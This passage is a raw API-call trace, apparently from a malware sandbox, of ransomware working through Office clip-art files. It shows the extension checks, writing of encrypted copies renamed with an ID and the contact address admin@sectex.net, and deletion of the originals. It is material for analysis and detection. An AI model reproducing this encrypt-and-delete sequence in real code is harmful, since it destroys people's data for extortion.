	[0142.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.568] lstrlenW (lpString=".dbf") returned 4
	[0142.568] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.568] lstrlenW (lpString=".1cd") returned 4
	[0142.568] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.568] lstrlenW (lpString=".jpg") returned 4
	[0142.568] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.568] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.568] lstrlenW (lpString="BL00648_.WMF") returned 12
	[0142.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.569] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=11500) returned 1
	[0142.569] CloseHandle (hObject=0x3a8) returned 1
	[0142.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf")) returned 0x20
	[0142.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.569] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.570] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.570] GetLastError () returned 0x0
	[0142.570] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2cec, lpOverlapped=0x0) returned 1
	[0142.589] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2cf0, lpOverlapped=0x0) returned 1
	[0142.590] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.590] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.590] SetEndOfFile (hFile=0x31c) returned 1
	[0142.711] CloseHandle (hObject=0x31c) returned 1
	[0142.712] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.712] SetEndOfFile (hFile=0x3a8) returned 1
	[0142.924] CloseHandle (hObject=0x3a8) returned 1
	[0142.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf")) returned 1
	[0142.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.984] lstrlenW (lpString=".doc") returned 4
	[0142.984] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.984] lstrlenW (lpString=".docx") returned 5
	[0142.984] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.984] lstrlenW (lpString=".pdf") returned 4
	[0142.984] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString=".xls") returned 4
	[0142.985] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.985] lstrlenW (lpString=".xlsx") returned 5
	[0142.985] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.985] lstrlenW (lpString=".ppt") returned 4
	[0142.985] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.985] lstrlenW (lpString=".zip") returned 4
	[0142.985] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.985] lstrlenW (lpString=".rar") returned 4
	[0142.985] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString=".bz2") returned 4
	[0142.985] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString=".7z") returned 3
	[0142.985] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.985] lstrlenW (lpString=".dbf") returned 4
	[0142.985] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.985] lstrlenW (lpString=".1cd") returned 4
	[0142.985] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.985] lstrlenW (lpString=".jpg") returned 4
	[0142.985] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.985] lstrlenW (lpString=".doc") returned 4
	[0142.985] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.985] lstrlenW (lpString=".docx") returned 5
	[0142.985] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.985] lstrlenW (lpString=".pdf") returned 4
	[0142.986] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.986] lstrlenW (lpString=".xls") returned 4
	[0142.986] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.986] lstrlenW (lpString=".xlsx") returned 5
	[0142.986] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.986] lstrlenW (lpString=".ppt") returned 4
	[0142.986] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.986] lstrlenW (lpString=".zip") returned 4
	[0142.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.986] lstrlenW (lpString=".rar") returned 4
	[0142.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.986] lstrlenW (lpString=".bz2") returned 4
	[0142.986] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.986] lstrlenW (lpString=".7z") returned 3
	[0142.986] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.986] lstrlenW (lpString=".dbf") returned 4
	[0142.986] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.986] lstrlenW (lpString=".1cd") returned 4
	[0142.986] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63
	[0142.986] lstrlenW (lpString=".jpg") returned 4
	[0142.986] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.986] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.986] lstrlenW (lpString="BS00135_.WMF") returned 12
	[0142.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.987] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1044) returned 1
	[0142.987] CloseHandle (hObject=0x398) returned 1
	[0142.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf")) returned 0x20
	[0142.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.987] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.988] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0142.988] GetLastError () returned 0x0
	[0142.988] ReadFile (in: hFile=0x398, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x414, lpOverlapped=0x0) returned 1
	[0142.995] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x420, lpOverlapped=0x0) returned 1
	[0142.995] ReadFile (in: hFile=0x398, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.995] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.996] SetEndOfFile (hFile=0x3ac) returned 1
	[0142.996] CloseHandle (hObject=0x3ac) returned 1
	[0142.996] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.996] SetEndOfFile (hFile=0x398) returned 1
	[0143.004] CloseHandle (hObject=0x398) returned 1
	[0143.004] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.005] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf")) returned 1
	[0143.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.006] lstrlenW (lpString=".doc") returned 4
	[0143.006] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString=".docx") returned 5
	[0143.007] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.007] lstrlenW (lpString=".pdf") returned 4
	[0143.007] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString=".xls") returned 4
	[0143.007] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.007] lstrlenW (lpString=".xlsx") returned 5
	[0143.007] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.007] lstrlenW (lpString=".ppt") returned 4
	[0143.007] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.007] lstrlenW (lpString=".zip") returned 4
	[0143.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.007] lstrlenW (lpString=".rar") returned 4
	[0143.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString=".bz2") returned 4
	[0143.007] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString=".7z") returned 3
	[0143.007] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.007] lstrlenW (lpString=".dbf") returned 4
	[0143.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.007] lstrlenW (lpString=".1cd") returned 4
	[0143.007] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.007] lstrlenW (lpString=".jpg") returned 4
	[0143.007] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.007] lstrlenW (lpString=".doc") returned 4
	[0143.007] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.007] lstrlenW (lpString=".docx") returned 5
	[0143.008] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.008] lstrlenW (lpString=".pdf") returned 4
	[0143.008] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.008] lstrlenW (lpString=".xls") returned 4
	[0143.008] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.008] lstrlenW (lpString=".xlsx") returned 5
	[0143.008] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.008] lstrlenW (lpString=".ppt") returned 4
	[0143.008] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.008] lstrlenW (lpString=".zip") returned 4
	[0143.008] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.008] lstrlenW (lpString=".rar") returned 4
	[0143.008] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.008] lstrlenW (lpString=".bz2") returned 4
	[0143.008] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.008] lstrlenW (lpString=".7z") returned 3
	[0143.008] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.008] lstrlenW (lpString=".dbf") returned 4
	[0143.008] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.008] lstrlenW (lpString=".1cd") returned 4
	[0143.008] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63
	[0143.008] lstrlenW (lpString=".jpg") returned 4
	[0143.008] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.008] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.008] lstrlenW (lpString="BS00136_.WMF") returned 12
	[0143.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0143.009] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2166) returned 1
	[0143.009] CloseHandle (hObject=0x398) returned 1
	[0143.009] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf")) returned 0x20
	[0143.009] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0143.009] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.010] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0143.010] GetLastError () returned 0x0
	[0143.010] ReadFile (in: hFile=0x398, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x876, lpOverlapped=0x0) returned 1
	[0143.024] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x880, lpOverlapped=0x0) returned 1
	[0143.025] ReadFile (in: hFile=0x398, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.025] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.025] SetEndOfFile (hFile=0x38c) returned 1
	[0143.025] CloseHandle (hObject=0x38c) returned 1
	[0143.025] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.025] SetEndOfFile (hFile=0x398) returned 1
	[0143.027] CloseHandle (hObject=0x398) returned 1
	[0143.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.027] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf")) returned 1
	[0143.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.030] lstrlenW (lpString=".doc") returned 4
	[0143.030] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.030] lstrlenW (lpString=".docx") returned 5
	[0143.030] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.030] lstrlenW (lpString=".pdf") returned 4
	[0143.030] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.030] lstrlenW (lpString=".xls") returned 4
	[0143.030] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.030] lstrlenW (lpString=".xlsx") returned 5
	[0143.030] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.030] lstrlenW (lpString=".ppt") returned 4
	[0143.030] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.030] lstrlenW (lpString=".zip") returned 4
	[0143.030] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.030] lstrlenW (lpString=".rar") returned 4
	[0143.030] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.030] lstrlenW (lpString=".bz2") returned 4
	[0143.030] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.030] lstrlenW (lpString=".7z") returned 3
	[0143.030] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.030] lstrlenW (lpString=".dbf") returned 4
	[0143.030] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.030] lstrlenW (lpString=".1cd") returned 4
	[0143.030] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.030] lstrlenW (lpString=".jpg") returned 4
	[0143.030] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.031] lstrlenW (lpString=".doc") returned 4
	[0143.031] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.031] lstrlenW (lpString=".docx") returned 5
	[0143.031] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.031] lstrlenW (lpString=".pdf") returned 4
	[0143.031] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.031] lstrlenW (lpString=".xls") returned 4
	[0143.031] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.031] lstrlenW (lpString=".xlsx") returned 5
	[0143.031] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.031] lstrlenW (lpString=".ppt") returned 4
	[0143.031] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.031] lstrlenW (lpString=".zip") returned 4
	[0143.031] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.031] lstrlenW (lpString=".rar") returned 4
	[0143.031] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.031] lstrlenW (lpString=".bz2") returned 4
	[0143.031] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.031] lstrlenW (lpString=".7z") returned 3
	[0143.031] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.031] lstrlenW (lpString=".dbf") returned 4
	[0143.031] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.031] lstrlenW (lpString=".1cd") returned 4
